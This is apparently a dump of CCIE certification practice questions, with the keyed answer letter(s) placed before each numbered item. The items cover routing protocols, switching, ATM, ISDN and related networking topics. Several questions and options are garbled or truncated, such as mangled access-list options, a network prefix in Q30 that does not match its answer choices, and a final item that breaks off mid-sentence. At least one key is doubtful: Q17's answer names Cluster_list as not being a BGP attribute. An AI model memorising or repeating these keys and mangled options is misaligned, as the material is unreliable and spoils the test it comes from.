B #CCIE Q1 Load sharing of VLAN traffic over parallel ISL trunks is:^A. Not possible due to the nature of ISL.^B. Configurable on a per VLAN basis.^C. Configurable on a per packet basis.^D. Automatic due to the nature of ISL and its interaction with the IEEE Spanning Tree protocol. D #CCIE Q2 What does the EIGRP Feasibility Condition mean?^A. The FD must be unique.^B. The FD must be higher than zero.^C. The FD must be equal to RD.^D. The RD must be lower than FD.^E. None of the above. A #CCIE Q3 A network administrator is running OSPF demand circuit across an ISDN link. What statement iscorrect?^A. The calling router must be network type pointpoint.^B. OSPF demand circuit requires network type non-broadcast.^C. OSPF demand circuit will not trigger the link if an OSPF interface goes down.^D. OSPF demand circuit will bring up the link if the topology of the network changes. C #CCIE Q4 In a PIMv2 Sparse Mode network, the “incoming interface” for a (*, G) mroute entry is calculated using:^A. The address of the source.^B. The address of the PIM neighbor that send the PIM (*, G) Join message.^C. The address of a directory connected member of group “G”.^D. The address of the currently active Rendezvous Point for group “G”.^E. The address of the Mapping Agent. A #CCIE Q6 Assume a Catalyst 6500 with a Supervisor IA with a MSFC. The MSFC has lost its boot image and thedevice is now in Rommon.^ What method will work to load c6msfcbin?^A. Xmodem^B. FTP^C. TFTP^D. SNMP A #CCIE Q8 What statement is FALSE with respect to the operation of Unidirectional Link Detection?^A. It negotiates the Unidirectional Link Detection link state during physical signaling.^B. It performs tasks that autonegotiation cannot perform.^C. It works by exchanging protocol packets between the neighboring devices.^D. Both devices on the link must support Unidirectional Link Detection and have it enabled on respectiveports. B #CCIE Q10 What is true concerning Traffic contract, Traffic shaping, and Traffic policing in ATM networks?^A. They are parameters of PNNI set during PNNI configuration.^B. They are forms of QoS features used in ATM networks.^C. They are types of SVCs.^D. They are types of PVCs.^E. They are only used between ATM switches to control traffic flows. E #CCIE Q12 Which are the primary reasons to use traffic shaping?^A. To control the maximum rate of traffic transmitted or received on an interface.^B. To control access to available bandwidth.^C. To define Layer 3 aggregate or granular incoming or outgoing bandwidth rate limits.^D. To control the average queue size by indicating to the end hosts when they should temporarily slowdown transmission of packets.^E. To ensure that traffic conforms to the policies established for it. D #CCIE Q13 In a bridged network running IEEE 802.1d spanning tree, what parameter will a bridge take form theroot bridge?^A. Maxage^B. Forwarding delay^C. Hello time^D. All of the above B #CCIE Q14 What statement is FALSE concerning the use of SPAN on the Catalyst 6500?^A. It is possible to configure SPAN to have a Gigabit port, such as source port, and a 10/100 port as thedestination port.^B. If the source port is configured as a trunk port, the traffic on the destination port will be tagged as well,regardless of the configuration on the destination port.^C. When a SPAN session is active the destination port does not participate in Spanning Tree.^D. With SPAN an entire VLAN can be configured to be the source.^E. In one SPAN session it is possible to monitor multiple ports that do not belong to the same VLAN. A #CCIE Q16 What command switches a SONET APS protected circuit over the back-up circuit?^A. aps force atm circuit-.number^B. aps manual circuit-number^C. redundancy force-failover^D. aps backnumber^E. aps force circuit-number E #CCIE Q17 What is NOT a BGP attribute?^A. Origin^B. Weight^C. Local_pref^D. Community^E. Cluster_list A #CCIE Q18 According to the IEEE 802.11b Wireless LAN specification, what sub-field is NOT part of the FrameControl Field?^A. Duration^B. Power Management^C. Wired Equivalent Privacy^D. More Fragments^E. Order B #CCIE Q19 A switch has been configured to support MultiLayer Switching (MLS). ^ In addition, Access Control Listson the MLS-Route Processor have been configured to block all FTP traffic destined to the Internet.^ What flow mask will be used to create each shortcut?^A. Application flow mask.^B. Full flow mask.^C. Destination^D. Destination flow mask. E #CCIE Q21 What feature is provided by IOS NAT (Network Address Translation)?^A. Dynamic network address translation using a pool of IP addresses, or port address translation using asingle IP address.^B. Destination based address translation using either route map or extended access-list.^C. Dynamic translation for DNS “A” and “PTR” queries.^D. Inside and outside source static network translation that allows overlapping network address spaces onthe inside and the outside.^E. All of the above. A,B #CCIE Q22 Which statements about FTP are true?^A. FTP always uses two separate TCP sessions – one for control and one for data.^B. With passive mode FTP, both the control and data TCP sessions are initiated from the client.^C. With active mode FTP, the server used the “PORT” command to tell the client on which port it wishedto send the data.^D. For both active and passive mode FTP, the control session on the server always uses TCP port 21, andthe data session always uses TCP port 20. B #CCIE Q23 A network administrator wants an IP static route to point to a backup link, but only if the same route isnot available via a dynamic routing protocol.^ How would this be accomplished?^A. Create a static route with a lower administrative distance than the dynamic protocol.^B. Create a static route with a higher administrative distance than the dynamic protocol.^C. Create a static route with a lower metric than the dynamic protocol.^D. Create a static route with the floating-static keyword. C #CCIE Q24 In Token Ring networks, Layer 3 IP Multicast addresses are mapped into Layer 2 Token Ring Macaddresses in which ways?^A. All IP Multicast addresses are mapped to broadcast MAC address FFFF.FFFF.FFFF.^B. All IP Multicast addresses are mapped to Functional Address C000.0000.0001.^C. All IP Multicast addresses are mapped to Functional Address C000.0004.0000.^D. All IP Multicast addresses are mapped to MAC addresses using the same method as is used in Ethernetnetworks.^E. Configure the Ring Parameter server to set the I/G address to 1. A #CCIE Q25 Consider the length of the netmask of a route, the administrative distance and the metric, what comesfirst when the router performs a route lookup in order to decide which interface to be forwarded apacket out of?^A. The length of the netmask of a route.^B. The administrative distance.^C. The metric.^D. None of the above. A #CCIE Q28 What trunk mode combination would not produce an operational ISL trunk?^A. Local: auto Remote: auto^B. Local: on Remote: auto^C. Local: nonegotiate Remote: nonegotiate^D. Local: nonegotiate Remote: on^E. Local: auto Remote: desirable B #CCIE Q30 A network administrator wants to advertise the network 135.30.0/27 to an EBGP peer. ^ What commandwould be used to accomplish this?^A. network 135.30.45.0 255.255.0.0^B. network 135.30.45.0 mask 255.255.255.224^C. network 135.30.45.0^D. network 135.45.0.0 C #CCIE Q32 What is the maximum one-way latency allowed by the ITU that is acceptable for the majority of voiceapplications?^A. 15 milliseconds^B. 30 milliseconds^C. 150 milliseconds^D. 300 milliseconds^E. 1.5 seconds B #CCIE Q33 Form ATM switched Virtual Circuits to work correctly, what is required?^A. ARP server.^B. Signalling and ILMI PVC’s.^C. QoS type set to CBR+.^D. All of the above. C #CCIE Q34 MPLS traffic engineering routing information is carried by:^A. BGP MEDs^B. MP-BGP^C. OSPF Opaque LSAs or IS-IS TLVs^D. RTP or RTCP packets A #CCIE Q35 What type of EIGRP packets carry the Init flag embedded?^A. Hello^B. Update^C. Query^D. Reply^E. Ack A #CCIE Q36 An AT&T 5ESS NI1 switch uses what terminal type of ISDN?^A. Terminal type A.^B. Terminal type B.^C. Terminal type C.^D. Terminal type D.^E. All of the above. A,C,E #CCIE Q38 Which are common problems that cause clocking problems on a serial line?^A. Several cables connected together in a row.^B. Too much –db gain on the serial line.^C. Incorrect CSU configuration.^D. Impedance mismatch.^E. Incorrect DSU configuration. B #CCIE Q39 There is a pointpoint ISDN link between Routers A and ^B. Router A must be able to dial Router B,but Router B must NOT be able to dial Router A.What will accomplish this?^A. Use an IP accessgroup command on the interface.^B. Remove the dial string from Router B.^C. Use the no-dial keyword on the interface.^D. Use the same IP address on both sides of the link. C #CCIE Q41 Considering OSPF where a binding between an interface and an area has been done, what is the effect ofdefining such an interface as passive?^A. OSPF will not form any adjacency out if that interface but it will accept the routing updates from theneighbors.^B. OSPF will form all the available adjacencies out of that interface but it wont install any of the learnedroutes in the local routing table.^C. OSPF will not form any adjacency out of that interface.^D. OSPF will behave as a passive adjacency at the requests coming from neighbors, lying out of theinterface, ignoring all the incoming requests.^E. None of the above. C #CCIE Q42 With respect to the ATM Reference Model what is NOT one of the ATM layers?^A. Physical layer.^B. ATM adaptation layer (AAL).^C. Generic Flow Control (GFC) layer.^D. ATM layer. A #CCIE Q44 What statement is TRUE regarding VLAN Trunk Protocol (VTP) pruning?^A. VTP pruning only affects traffic from VLANs that are pruning eligible.^B. VLAN 1 is always pruning eligible.^C. Pruning eligibility is determined by the amount of ports assigned to a VLAN.^D. VTP pruning is a way to detect the removal of a VLAN within a VTP domain. C #CCIE Q45 Routers A, B, and C are running IGRP over frame relay connections. ^ No subinterfaces are used, and asingle IP subnet is used for all the Frame Relay interfaces. ^ Router A is able to see routers from both Router B and Router C, but Router B and Router C cannot see routers from each other.^ Which could be causing this problem?^A. Router A is missing frame maps.^B. Router B and Router C are missing frame maps.^C. Split-horizon is enabled on Router A.^D. Split-horizon is disabled on Router A. A #CCIE Q46 What is the goal of the ISIS CSNP and the PSNP packets?^A. PSNP are used either to acknowledge the receipt or to request the retransmission of the latest version ofan LSP while the CSNP are used for synchronizing the LS Database or adjacent neighbors.^B. CSNP are used either to acknowledge the receipt to or to request the retransmission of the latest versionof an LSP while the PSNP are used for synchronizing the LS Database of adjacent neighbors.^C. PSNP are used to acknowledge the receipt of the latest version of an LSP while the CSNP are usedeither for synchronizing the LS Database of adjacent neighbors or to request the retransmission of anLSP.^D. CSNP are used to acknowledge the receipt of the latest version of an LSP while the PSNP are usedeither for synchronizing the LS Database of adjacent neighbors or to request the retransmission of anLSP. B,C #CCIE Q47 Suppose a network access server (NAS) is configured to use TACACS+ to provide user authenticationservice for remote access users. ^ The NAS get an ERROR in response to its authentication request when:^A. The TACACS+ service is not running on the server.^B. The supplied user password is incorrect.^C. The username does not exist in the TACACS+ user database.^D. The NAS TACACS+ server key does not match that on the server.^E. The TACACS+ server is unreachable by the NAS. B,D #CCIE Q48 Routers 1, 2, 3, and 4 are all connected to a hub via Ethernet interfaces. ^ All routers have a basic OSPFconfiguration of a network statement for the Ethernet network.^ show ip ospf neighbor on Router 2 shows 2WAY/DROTHER for its neighbor, Router 3.^ Which conclusions can we dram from this?^A. R2 is the DR or BDR.^B. R3 is not a DR or BDR.^C. R2 – R3 adjacency is not FULL yet as the only possible conclusion.^D. R2 is not the DR.^E. R4 is the DR. D #CCIE Q49 A new Catalyst switch is in a lab. ^ It is decided that a download of the latest supervisor image is needed, so the switch is connected to the corporate Catalyst switch in the lab through the supervisor gigabit portsthat are both in VLAN 100 with a single fiber pair. ^ VLAN 100 only existed on the two supervisor portsused and only one router existed in that VLAN. ^ Shortly thereafter thousands of complaints are receivedthat users cannot connect to anything on the network. ^ What command should have been issued on the labswitch prior to connecting to the corporate switch to prevent this problem?^A. Clear cam dynamic.^B. Set spantree uplinkfast enable 1/1.^C. Set trunk 1/1 desirable isl.^D. Set vtp mode transparent.^E. Set port broadcast 1/1 25% unicast enable. C #CCIE Q50 The configured passwords for a Catalyst 5000 switch have been lost. The switch will use a knownpassword for the first 30 seconds after boot.What is the password?^A. cisco^B. Cisco^C. Enter key^D. Ctrlx^E. SanFran C #CCIE Q51 A company has deployed a new e-commerce web farm. ^ They are using teamed servers that use multicastto maintain a heartbeat between redundant pairs. All servers are in the 192.168.202.0/24 network. ^ Forincreased security, they require each pair of servers be allowed to see multicast/broadcast traffic fromtheir default gateway and from each other. ^ No pair of servers should ever see any broadcast/multicasttraffic from any other pair of servers. ^ Which is the best mechanism for the server ports to accomplishthis?^A. Isolated Ports.^B. Promiscuous Ports.^C. Community Ports.^D. Teamed Ports.^E. Span Ports. B #CCIE Q52 Which EIGRP packets are sent using a reliable mechanism?^A. Hello^B. Update^C. Query^D. Reply^E. Ack A,B,C #CCIE Q53 Which protocols do not need to have their own router ID reachable by other routers to have propernetwork connectivity?^A. OSPF^B. BGP^C. EIGRP^D. LDP^E. TDP B,C #CCIE Q55 Transparent bridges forward, flood, or drop frames based upon entries in the bridge table which may bedynamically added to or removed from the table. ^ Which statements are TRUE regarding bridge tableentries?^A. Bridge table entries are learned by examining the destination MAC address of each frame.^B. Bridge table entries are learned by examining the source MAC address of each frame.^C. Increasing the bridge table aging time would result in a reduction of flooding.^D. Decreasing the bridge table aging time would result in a reduction of flooding.^E. It is important to ensure that the aging time is less than the aggregate time to detect and recalculate thespanning tree. E #CCIE Q56 Which events cause the EIGRP neighbor relationship to be restarted?^A. Issuing the clear ip route command.^B. Receiving an update packet with Init flag set from a known, already established neighbor relationship.^C. Receiving an update packet from an unknown neighbor.^D. Clearing the IP cache.^E. Clearing the IP EIGRP neighbor relationship. D #CCIE Q57 What protocol is NOT part of the Signaling System No. 7?^A. ISUP^B. TCAP^C. MTP^D. SIP^E. SCCP A,C #CCIE Q58 By entering the IOS global configuration command aaa new-model, which authentication protocols willbe disabled?^A. TACACS^B. TACACS+^C. Extended TACACS (XTACACS)^D. Radius^E. Kerberos B #CCIE Q59 The IEEE 802.5 standard defines the specifications for token ring networks. ^ The standard uses acentralized ring maintenance mechanism called active monitor that oversees the ring. ^ What is NOT aresponsibility of the active monitor?^A. Checking for lost tokens.^B. Locating breaks in the ring.^C. Removing continuously circulating frames resulting from a failed sending device from the ring-^D. Cleaning up the ring when garbled frames appear.^E. Inserting delay bits to the ring if it is not big enough for the token to circulate. C #CCIE Q60 The LAPD protocol is formally specified in:^A. ITU-T T.30^B. ITU-T T.261^C. ITU-T Q.920^D. ITU31^E. ITU931 C #CCIE Q62 What flag in the TCP header tells the receiver to pass all the data to the receiving application uponarrival?^A. ACK^B. SYN^C. PSH^D. URG^E. RST A #CCIE Q63 Routers A and B are running BGP in the same Autonomous System. ^ Routers from Router B show up inthe BGP table of Router ^ A, but not in the routing table of Router A as BGP routes.What might cause this?^A. Synchronization is on but Router A is not receiving the same routes via an internal protocol.^B. Synchronization is off but Router A is not receiving the same routes via an internal protocol.^C. Synchronization is off but the BGP peers are down.^D. Nextself is disabled on Router A. D #CCIE Q64 Like the reserved Private IP address ranges (RFC 1918), there is also a list of Class D reserved Multicastaddresses (RFC 1700). ^ Select the correct answer that matches RFC 1700.^A. 224.0.0.0 – 224.255.255.255^B. 225.0.0.0 – 225.255.255.255^C. 232.0.0.0 – 232.255.255.255^D. 239.0.0.0 – 239255^E. All of the above. C #CCIE Q67 Which is the protocol that On-Demand Routing relies on?^A. IP^B. TCP^C. CDP^D. UDP^E. PPP B #CCIE Q68 Traceroute does not work on Host A (a Unix workstation) to the Internet. ^ Currently, there is an inboundaccesslist 101 permit tcp any any”. ^ Whataccess-list entry may need to be added in order to get traceroute to work?^A. access-list 101 permit udp any any^B. accessexceededaccessunreachable^C. accessexceededaccessunreachable^D. access-list 101 permit icmp any any echoaccessunreachable^E. access-list 101 permit udp any anyaccessunreachable E #CCIE Q71 The BGP backdoor command:^A. Changes the distance of an iBGP route to 20.^B. Changes the distance of an eBGP route to 200.^C. Changes the distance of an IGRP route to 200.^D. Changes the distance of an IGP route to 20.^E. Does not change the distance of the route. D #CCIE Q73 What is not a valid DNS resource record?^A. MX^B. PTR^C. A^D. FQDN^E. NS D #CCIE Q74 router ospf 1redistribute igrp 20 metric 50 subnets^ What is the effect if the subnets keyword in the above configuration?^A. It forces IGRP to support VLSM in this context.^B. It causes OSPF to recognize classful networks.^C. It has not effect, IGRP always summarizes on class boundaries anyway.^D. It causes OSPF to accept networks with non-classful masks. B,C,D,E #CCIE Q75 Which four features does RIP version 2 provide, which were impossible with RIP version 1? (Choosefour)^A. Poison reverse and classless routing.^B. Classless routing and split-horizon.^C. Poison reverse and updates to multicast address.^D. Classless routing and updates to multicast address.^E. Route tag and classless routing. D #CCIE Q77 What is true about Custom Queuing?^A. Custom queuing will always empty a queue before proceeding to the next queue.^B. Custom queuing can be used to restrict a particular type of traffic to a given bandwidth regardless of theload on that link.^C. Custom queuing looks at groups of packets from the same source-destination pair.^D. Custom queuing can prevent one type of traffic from dominating a busy link. B #CCIE Q78 What ISDN reference point network boundary does not have an ITU-T standard?^A. S/T^B. U^C. R^D. S^E. T A #CCIE Q79 Which statements are true concerning distance vector and link state routing protocols?^A. Distance vector protocols have a finite limit of hop counts whereas link state protocols do not have alimit on the number of hops for a route.^B. Distance vector protocols have better convergence that link state protocols.^C. RIP is a distance vector protocol whereas RIP version 2 and OSPF are link state protocols.^D. Distance vector protocols only send updates to neighboring routers whereas link state protocols floodupdates to all routers in the within the same routing domain.^E. Both distance vector and link state protocols will take link bandwidth and delays into account whencalculating routes. D #CCIE Q80 What security service is NOT provided by IPSec?^A. Data confidentiality.^B. Data integrity.^C. Data origin authentication.^D. Protection for multicast/broadcast traffic.^E. Anti-replay. E #CCIE Q81 When configuring IPSec on IOS routers, what is a valid ISAKMP policy parameter?^A. SA lifetime.^B. Encryption algorithm.^C. Hash algorithm.^D. Authentication method.^E. All of the above. B #CCIE Q83 Policing on a Fast Ethernet interface has been configured using Committed Access Rate (CAR) to allowfor extended burst. ^ Traffic has been bursty and a packet arrives on the interface that causes thecompounded debt to be greater than the extended burst. What statement is FALSE?^A. The packet is dropped.^B. A token is removed from the token bucket.^C. The compounded debt value is effectively set to zero (0).^D. The packet is not buffered by the CAR process. B #CCIE Q84 When connecting two different VLAN Trunk Protocol domains together via and ISL trunk, the switchesfail to form the trunk automatically. ^ What is the likely cause?^A. The trunks need to be set to “on” or “nonegotiate”.^B. The VTP domain names carried in the Dynamic Inter-Switch Link (DISL) messages are not the same.^C. The Unidirectional Link Detection timers are shorter than the Spanning Tree Protocol (STP) timers.^D. The native VLANs are the same.^E. The VLAN Trunk Protocol multicast address was set to 01 C #CCIE Q88 What is the first task required in password recovery on a Catalyst 5000 series switch?^A. Set the configuration register to ignore the startup configuration.^B. Set the boot register to 0x2142.^C. Power cycle the switch.^D. Reload the switch using the reload command. A #CCIE Q89 Exhibit:In the MPLS network shown, how many routing tables are on Router TK1?^A. 1^B. 2^C. 3^D. 4^E. 5 A,B #CCIE Q90 Which statements are FALSE concerning the use of VACLs on the Catalyst 6500 switch? (Choose two)^A. VACLs can be used to forward/drop and redirect traffic based on Layer 2 and Layer 3 information.^B. VACLs cannot be used when using QoS on the switch.^C. VACLs can be used together with RACL’s.^D. VACLs can be used for traffic that is being L3 switched.^E. VACLs do not cause extra latency for traffic passing through the switch. A #CCIE Q92 According to the IEEE 802.5 Token Ring specification, what fields is an optional component?^A. RI – Routing Information^B. FC – Frame Control^C. FCS – Frame Check Sequence^D. EFS – End of Frame Sequence^E. AC – Access Control C #CCIE Q94 What is the purpose of the clock source command used in IOS T1/E1 interface command mode, wandwhat is the default setting?^A. Routers are DTEs and NEVER supply clock to T1/E1 line.^B. clock source identifies the stratum level associated with the router T1/E1 and the default us Stratum 1.^C. clock source chooses a source for the interface to clock outbound data.The default is clock source line –Specifies that the T1/E1 link uses the recovered clock from the line.^D. clock source chooses a source for the interface to clock buffered data.The default is clock source loop-timed –Specifies that the T1/E1 interface takes the clock from the Tx(line) and uses it for Rx. A #CCIE Q96 In Frame Relay traffic shaping, the bc and be parameters are expresses as:^A. Bits per second.^B. Bits per interval.^C. Bytes per second.^D. Bytes per interval. B #CCIE Q97 What signaling protocol does Cisco use to provide support for MPLS traffic engineering?^A. RSVP^B. LDP^C. SS7^D. TDP B,D,E #CCIE Q98 This inbound ACL is configured on the router:^ access-list 101 permit tcp any host 209.165.201.10 eq telnet^ access-list 101 deny ip any anyWhich types of packets will be permitted through the router?^A. A non-fragment packet going to the server on port 21.^B. A non-initial fragment packet going to the server on port 23.^C. A nonfragment going to another host that’s not 229.165.201.10.^D. A non-initial fragment packet going to the server on port 21.^E. An initialfragment packet going to the server on port 23. B,E #CCIE Q99 Which two are correct framing types for a T1 data line? (Choose two)^A. B8ZS^B. SF^C. EMI^D. AMI^E. ESF E #CCIE Q101 Which are LANE Components that are used to logically establish a LANE network?^A. LECS, redundant LECS, and BUS.^B. SSRP, UNI, NNI and LEC.^C. ILMI, AAL5, LANE and SSCOP.^D. BUS, LES, LEC and VCC.^E. LECS, LES, and BUS. A #CCIE Q106 Using a sniffer, it is verified that a Router is receiving a specific SAP but the server is not showing up inthe server table. ^ Which are possible reasons?^A. The Router doesn’t know how to get to the IPX network advertised in the SAP packet.^B. The SAP table already contains a similar entry with a different SAP type.^C. There is an Access-list configured to filter out this SAP type.^D. The router only runs NLSP.^E. The server only runs NLSP. D #CCIE Q108 ISDN TE2 includes:^A. Devices that manage switching functions.^B. Devices that use the standard ISDN interface.^C. The boundary between the carrier’s ISDN network and the CPE.^D. Devices that do not use the standard ISDN interface.^E. None of the above. E #CCIE Q109 To what IP address does RIPv2 send its own routing update packets?^A. 224.0.0.10^B. 255.255.255.255^C. 224.0.0.13^D. 224.0.0.5^E. 224.0.0.9 E #CCIE Q110 How does a router behave in relation to an EIGRP stub neighbor?^A. It will send only default-routes toward stub EIGRP neighbors.^B. It well send only summary routes toward stub EIGRP neighbors.^C. It will not query the stub EIGRP neighbor about any internal route.^D. It will not query the stub EIGRP neighbor about any external route.^E. It will not query the stub EIGRP neighbor about any route. E #CCIE Q111 An interface has been configured for custom queuing. Bandwidth has been allocated for three flows A, Band C with average packet sizes of 1000 bytes, 500 bytes and 250 bytes respectively. ^ If flow A has beenconfigured to allow one packet per servicing of its queue, how many packets need to be allowed for flowC in order to achieve a ratio of 20:50:30 for flows A, B and C respectively?^A. 1^B. 2^C. 3^D. 4^E. 5^F. 6 D #CCIE Q112 What effect do these configuration commands have?line vty 0 4no loginpassword cisco^A. The VTY password is cisco.^B. The login password is login^C. The VTY password is required but not set.^D. No password is required for VTY access. A #CCIE Q113 Multicast addresses in the range of 239.0.0.0 through 239.255.255.255 are reserved for:^A. Administratively Scoped multicast traffic that is intended to remain inside of a private network and isnever intended to be transmitted into the Internet.^B. Global Internet multicast traffic intended to travel throughout the Internet.^C. Link-local multicast traffic consisting of network control messages that never leave the local subnet.^D. Any valid multicast data stream. D #CCIE Q114 What is the tiebreaker used by ISIS to elect the Designated IS on a LAN in a case where all the neighborshave the same priority?^A. The lowest MAC address.^B. The highest router-ID.^C. The lowest router-ID.^D. The highest SNPA.^E. The lowest system-ID. B,C #CCIE Q115 When using a sniffer directly connected to an access switch, the sniffer sees an excessive amount ofBPDUs with the TCA bit set.^ Which are the most likely explanations?^A. There are no problem in the network.^B. Ports connecting 2 workstations do not have spanning tree portfast configured.^C. Bad cabling is being used in the network.^D. The CPU utilization on the root switch is getting up to 99% and thus is not sending any BPDUs. C #CCIE Q116 A network administrator is using a private IP address space for the network with NAT to allow the usersto reach the Internet. ^ However, there is a web server on the internal network that must have incomingaccess from the Internet.What will be required to accomplish this?^A. Put the web server’s internal IP address in the external DNS records.^B. Use a dynamic mapping with the reverse keyword.^C. There must be a static NAT mapping for the web server’s address.^D. Dynamic NAT will take care of this automatically. B #CCIE Q118 When doing an IPX ping from a Cisco router to a Novell server there is no response.What is a possible cause?^A. Novell Servers never responds to IPX pings.This only works between Cisco Routers.^B. Cisco IPX Pings are being sent to a Novell Server.^C. There is no IPX network configured on Loopback 0.^D. The IPX server table doesn’t contain the correct SAP entry.^E. All of the above. B #CCIE Q120 What is not a transfer mode supported by HDLC?^A. ARM^B. ARB^C. ABM^D. NRM^E. LAPB D #CCIE Q122 According to the IEEE 802.2 Logical Link Control specification, the maximum transmit value for LLCflow control is:^A. 15^B. 127^C. 255^D. 1023^E. 4095 B #CCIE Q123 The interface command Router (config-if) invert txclock is used for what purpose?^A. It switches TXD and RXD to correct mis-wired cables.^B. It corrects systems that use long cables that experience high error rates when operating at the highertransmission speeds.^C. It configures the serial interface to monitor the DSR signal as the line up/down indicator.^D. It is used to correct situations where it is possible to send backback data packets over serialinterfaces faster than some hosts can receive them. D #CCIE Q124 It is suspected that packets are being lost on a link between one of your routers and the switch. ^ This connection is configured to be Full Duplex 100Mb Ethernet. To diagnose what is going on on this link, aFast Ethernet Hub is connected in between the Router and the Switch and an excessive number ofalignment errors, CRC errors and Late Collisions are seen.^ What statement is true?^A. Either the Router or the Switch is broken.Looking at sniffer traces, the Source MAC address of the error frames will determine what device it is.^B. These errors are not causing a performance problem.^C. The cabling is bad and thus needs to be replaced.^D. Adding the Hub in between might have caused the errors seen on the link. E #CCIE Q125 ^ Current configuration:^ version 12.0^ service timestamps debug uptime^ service timestamps log update^ no service password-encryption^ hostname Simon^ enable secret 5 $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^ enable password cisco^ Given the configuration shown above, what should you type to gain enable access on router Simon?^A. cisco^B. Simon^C. 4u3EW0^D. $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^E. Cannot tell B #CCIE Q126 What statement is true concerning Multilayer Switching?^A. The first packet in every flow will be forwarded by the MLS Switching Engine.^B. The first packet in every flow will be forwarded by the MLS Route Processor.^C. Every 10th packet in every flow will be redirected to the MLS Route Processor.^D. Every 100th packet in every flow will be forwarded by the MLS Route Processor.^E. All traffic will be forwarded by the MLS Switching Engine. B #CCIE Q128 Which layer in the OSI reference model are missing from the TCP/IP reference model?^A. Network^B. Presentation^C. Transport^D. Session^E. Data link A,C,E #CCIE Q129 A router running OSPF, that is being connected to Area 0 and Area 1, is configured with area 1 nssadefaultoriginate.Which are false?^A. The router will inject a type 3 default route into area 1.^B. The router will inject a type 7 default route into area 1.^C. The router will inject a type 5 default route into area 1.^D. The router needs a default route in its routing table to inject a default into area 1.^E. The router does not need a default route in its routing table to inject a default into area 1. E #CCIE Q131 How many LSPs does a non-pseudonode ISIS router originate?^A. 1 per link.^B. 1 per link and 1 per external route.^C. Always a minimum of 3.^D. 1, but 2 if there are external routes redistributed into ISIS on this router.^E. Always 1. C #CCIE Q132 Packets need to be sent, arriving via DLSW+ on Router A to a host on an Ethernet attached to Router A. ^ Bridging is enabled on the Ethernet but packets are not reaching the host. What is most likely theproblem?^A. SRTLB should be run between the source route Virtual Ring and the Ethernet.^B. The DLSW+ peer cost doesn’t match the Ethernet bridge group.^C. The DLSW+ bridge-group command is missing.^D. The bridge-group number on the Ethernet is too high. B #CCIE Q133 A company has 2 border routers running BGP to 2 different ISP’s. ^ They want to control which pathinbound traffic takes without the use of communities. ^ What is the most important consideration?^A. Metric^B. MED^C. AS-path prepending^D. Weight^E. Local preference B #CCIE Q135 What statement is TRUE regarding Fast Ethernet Channel?^A. Ports within a Fast Ether Channel do not have to be the same speed and duplex.^B. Port Aggregation Protocol (PAGP) facilitates the automatic creation of Fast Ether channels links.^C. Fast Ethernet Channels can not be configured as a trunk.^D. Ports within a Fast Ether Channels can not be configured as a trunk.^E. Ports within a Fast Ether Channel can be assigned to multiple VLANs. A #CCIE Q136 What is NOT true about IRB?^A. IRB allows the same protocol to be bridged and routed through the same physical interface.^B. IRB allows the same protocol to be bridged and routed on the same router.^C. IRB uses a virtual interface to connect bridge and routed interfaces.^D. IRB can support multiple protocols on the same router. B #CCIE Q137 When using an LX/LH Gbic, what is the maximum supported cable length when using a Single ModeFiber with a 8.3/9/19 micron Core?^A. 1504 ft (500 m)^B. 6.2 miles (10 km)^C. 3.1 miles (5 km)^D. 4.6 miles (7.5 km)^E. This type of fiber is not supported with an LX/LH gbic. D #CCIE Q138 A network administrator wants a filter that only allows IPX network numbers between BB100 andBB1FF (inclusive).What access list will accomplish this?^A. access-list 805 permit range BB100 BB1FF^B. access-list 850 permit any BB100.0000.0000.0000 B1FF.FFFF.FFFF.FFFF^C. access-list 920 permit any BB100.0000.0000.0000 FF.FFFF.FFFF.FFFF^D. None of the above. C #CCIE Q139 What command in interface configuration mode would you use to enable RSVP?^A. ip rsvp sender^B. ip rsvp enable^C. ip rsvp bandwidth^D. ip rsvp reservation^E. RSVP is enabled in global configuration mode, not in interface configuration mode. E #CCIE Q140 After adding a new switch to the network it is determined that it is not automatically learning the VLANsvia VTP. ^ What is most likely the cause?^A. The other switch is a VTP client.^B. The VTP server has not sent out a periodic VTP advertisement.^C. There are not yet users on the new switch.^D. The native VLAN on the trunk is VLAN 60.^E. The VTP domain name is misconfigured. B #CCIE Q141 The log of 7500 with a FDDI interface is showing this message about twice a day^ :%CBUSBADTXEOFVEC: Fddi0/0 ustatus: bad txEof vecIt is learned form the TAC that this message is indicative that the interface has aborted the transmit dueto a claim frame coming in to the interface while the interface was transmitting. ^ The FDDI ring containssome very important web servers and workstations for upper management.^ What action should be taken?^A. The TAC should be contacted and a case should be logged, as this is indicative of a major problem onthe FDDI ring.^B. Claim Frames are a normal occurrence, so no action should be taken.^C. A sniffer should be placed on the ring to find the cause of the claims.^D. The FDDI concentrator should be replaced, and all FDDI cables checked.^E. The FDDI Interface should be replaced. A #CCIE Q142 A large number of these messages are seen on a Catalyst console:^ %MLSMOVEOVERFLOW:Too many moves, stop MLS for 5 sec(20000000)^ %MLSRESUMESC:Resume MLS after detecting too many moves^ What is the least likely cause?^A. Transitory Spanning Tree loop^B. Unidirectional Fiber Link^C. Faulty Switch Port^D. Pinnacle Sync Failure D #CCIE Q144 Which statement concerning the difference between TACACS+ and RADIUS is NOT true?^A. TACACS+ uses UDP while RADIUS uses TCP for transport.^B. RADIUS only encrypts the password field of the packet while TACACS+ encrypts the entire body ofthe packet.^C. RADIUS is an IETF standard, while TACACS+ is not.^D. TACACS+ sends a separate request for authorization, while RADIUS uses the same request forauthentication and authorization. A #CCIE Q145 A legacy ISDN configuration connects, but EIGRP is not sending updates across the link.What could be causing this?^A. The dialer-list is blocking EIGRP.^B. The encapsulation is different on both sides of the link.^C. There is a network type mismatch.^D. The broadcast keyword is missing from the dialer-map. A #CCIE Q146 What LSA type does the area range command act on?^A. Type 1 and 2.^B. Type 3 and 5.^C. Type 4.^D. Type 1, 2 and 3.^E. Type 4 and 5. D #CCIE Q148 Which LSAs run inside a stub OSPF area?^A. Type1.^B. Type 1 and 3.^C. Type 1 and 2.^D. Type 1, 2 and 3.^E. Type 3 and 5. A #CCIE Q149 A port on a FDDI concentrator keeps getting disabled after a few hours and the port has to be manuallyre-enabled.Which are possible causes?^A. The link quality is bad.^B. Someone keeps disabling this port.^C. Claims frames are seen on the Ring.^D. There are too many late collisions.^E. IBM Spanning Tree has been enabled on the Concentrator. C #CCIE Q151 Is MTU part of the metric calculation of an EIGRP route?^A. No, never.^B. Yes, always.^C. Only if the appropriate K-value is activated.^D. Only the smallest MTU of any links along the path is used with the metric calculation. D #CCIE Q152 According to the IEEE 802.3 CSMA/CD specification, what MAC address is used for the PAUSEmechanism to inhibit the flow of frames for specified period of time?^A. 0000^B. 0001^C. 003C^D. 0101^E. 1111 B #CCIE Q153 Using Transmission 